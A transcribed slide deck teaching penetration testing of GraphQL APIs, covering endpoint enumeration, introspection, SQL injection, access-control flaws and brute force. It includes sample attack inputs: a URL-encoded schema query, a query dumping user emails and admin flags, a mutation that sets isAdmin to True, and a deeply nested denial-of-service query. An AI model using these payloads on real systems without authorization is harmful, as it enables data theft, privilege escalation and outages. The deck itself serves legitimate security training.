The document discusses the pentesting of applications using GraphQL, outlining its advantages over REST, such as reduced data fetching issues and rapid frontend development. It covers key concepts, such as schema, queries, and typical vulnerabilities, including SQL injection, information disclosure, and authorization bypass. Additionally, it provides useful tools and techniques for testing GraphQL applications and highlights various references for further learning.

1. Pentest Application With
GraphQL
Presented By:
Divyanshu Shukla
(@justm0rph3u5)
@justm0rph3u5 @justm0rph3u5

2. Agenda
• What is GraphQL
• REST vs GraphQL
• Example for REST/GraphQL
• Architecture
• Basics
• Pentesting GraphQL

3. What Is GraphQL?
• New API standard that was invented and open-sourced by Facebook.
• GraphQL is a query language for APIs - not databases.
• It is database agnostic and effectively can be used in any context where an
API is used.
• GraphQL enables declarative data fetching.
• GraphQL is used in production by multiple companies such as GitHub,
Twitter, Coursera, etc.

4. REST vs GraphQL?
• Multiple Round Trips To Fetch Related Resources.
• Over Fetching / Under Fetching.
• Rapid Product Iterations on the Frontend.
• Benefits of a Schema & Type System

5. REST vs GraphQL Example

6. REST Example

7. GraphQL Example

8. Architecture
Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e

9. Basics Terminology
• Schema Definition Language . Object Types & Fields
• Arguments . Aliases
• Fragments . Variables
• Directives
• Types of Requests:
oQuery
oMutations
oSubscriptions

10. Pentesting GraphQL
• Tools
• Enumeration
• Introspection
• SQL Injection
• Information Disclosure
• Broken Access Control
• Authorization Bypass
• Brute Force/Denial Of Service

11. Tools
• Altair GraphQL Client/GraphQL ide.
• GraphQL Raider (Burp Suite Extension).
• GraphQL_Introspection.py (Python script by Doyensec).
• GraphQL Vyoger (https://apis.guru/graphql-voyager/).

12. GraphQL Tip
• Pentesting an app that uses GraphQL? POST is more common, but
remember that it accepts GET too. URL encode & hit /graphql?query=. Eg,
a 'schema' request as GET:
https://example.com/graphql?query= {__schema%20{%0atypes%20{%0an
ame%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}
Thanks to https://twitter.com/coffeetocode

13. Enumeration
• Look for traffic sent via server to find graphql endpoint.
o/graphql/
o/graphql/console/
o/graphql.php
o/graphiql/
o/graphiql.php
• Try sending a request to API and error is : “Syntax Error: Expected Name, found }”.
This confirms graphql.
• GraphQL endpoints may have a GUI, if present we can check Docs directly.

14. Introspection
• GraphQL allows querying to get metadata via introspection query to find
out about the schema with description of data.
• It is similar to information_schema tables in databases.
• It allows attacker to find what requests exist/what arguments should be
passed.
• GraphQL Introspection Query:
https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d
• Developers can disable this feature but majority of applications leave it
open.
• Hands-On : Hackerone
Ref: https://graphqlmastery.com/blog/graphql-introspection-
and-introspection-queries

15. Injection
• Most of the applications are connected with any database. So there is a
high chance for SQL injection, NoSQL injection and other injections.
• Detecting SQL injection and exploiting it using UNION SELECT.
• Also using sqlmap for exploitation.
• There are high chance that application may have multiple parameters
vulnerable to SQL injections.
• Example : https://blog.usejournal.com/time-based-blind-sql-injection-in-
graphql-39a25a1dfb3c
• Hands On: https://pentesterlab.com/exercises/graphql_ii/course

16. Information Disclosure
• GraphQL is just a layer between client apps and the database.
• Try visiting url/graphql.php?debug=1 to find debug mode and additional
error reporting.
• Inserting single quote/double quote to find out error related to server
and graphql.
• Going through the id values/userquery, we will be able to get information
about other users (or maybe not, if everything is configured correctly).

17. Broken Access Control
• Broken Access control may allow attacker use admin email and brute-force
login credentials to get admin level access.
• Steps to reproduce:
• Accessing other users profile details like id, email.
• Vulnerable graphql query:
query{
users{
id
email
isAdmin isActive } }

18. Authorization Bypass
• Suppose we can create users:
mutation {
createPerson (username: ”User1", password: ”user1") { } }
• Assuming that there is a certain isAdmin parameter in the handler on the
server, we can send a request of the form:
mutation {
createPerson (username: ”User1", password: ”user1", isAdmin: True) { } }
• And make the user User1 an administrator.

19. Brute Force/Denial Of Service
• Brute forcing email, id, etc parameters.
• Brute forcing mutation and other similar queries.
• Low privilege or non-admin user can view details by brute-forcing login
credentials where rate limiting is not present.
• Nested queries can cause denial of service to the application.
query {
stories{ title body comments{ comment author{ comments{ author{ comments{ comment author{ comments{
comment author{ comments{ comment author{ name }} }
} } }
} } }
} } }

20. Reference
• https://github.com/graphql/graphiql
• https://www.slideshare.net/NeeluTripathy2/pentesting-graphql-
applications
• https://prog.world/pentest-applications-with-graphql/
• https://www.howtographql.com
• https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-
vulnerabilities-5d39f26cea2e
• https://blog.doyensec.com/2018/05/17/graphql-security-overview.html
• https://voidsec.com/graphql-security-overview-and-testing-tips/
• https://ctf.hacker101.com
• https://pentesterlab.com/exercises/graphql_ii/course